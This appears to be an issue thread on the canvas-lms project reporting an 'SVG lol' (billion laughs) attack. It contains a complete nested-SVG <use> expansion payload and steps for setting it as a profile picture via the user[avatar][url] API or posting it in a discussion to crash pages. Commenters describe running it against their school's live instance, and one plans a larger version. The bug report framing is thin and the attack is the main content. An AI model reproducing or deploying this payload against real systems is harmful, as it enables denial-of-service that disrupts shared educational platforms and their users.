canvas-lms svg lol attack

Summary: ability to crash the page with svg pfp

Steps to reproduce:

<svg version="1.2" baseProfile="tiny" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
<path id="a" d="M0,0"/>
<g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
<g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
<g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
<g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
<g id="f"><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/></g>
<g id="g"><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/></g>
<g id="h"><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/></g>
<g id="i"><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/></g>
<g id="j"><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/></g>
</svg>

make a svg file and put this ^
download a image to a eprofile, to make a public file
use api to change pfp to that svg with user[avatar][url]
refresh page with pfp and crashes

or just upload to a discussion

Expected behavior: crashes the page

Actual behavior: not crash it

maybe this has been fixed, I did this on my school's instance

Mar 06 '24 20:03 felinegirl

I think you did a little fliperoo there young lad, the expected behaviour should be to not crash the page.

Mar 18 '24 03:03 pythoncrazy

Interesting, I'll test this at some point.

Mar 18 '24 04:03 Injng

funny

Mar 19 '24 17:03 Khorne101

True lol Not even sure how'd you fix it besides just out right blocking svgs as pfps Guess people also call it a billion laughs attack lmao

Mar 19 '24 19:03 felinegirl

You are a furry :333333

Mar 19 '24 19:03 Khorne101

Maybe

Mar 19 '24 19:03 felinegirl

interesting, I will look into expanding further with this, maybe cause a trillion laughs. Side note, this is also tested on our school instance with discussions, also seems to crash it

Mar 21 '24 05:03 pythoncrazy

canvas-lms canvas-lms copied to clipboard

svg lol attack

Summary: ability to crash the page with svg pfp

Steps to reproduce:

Expected behavior: crashes the page

Actual behavior: not crash it

canvas-lms
canvas-lms copied to clipboard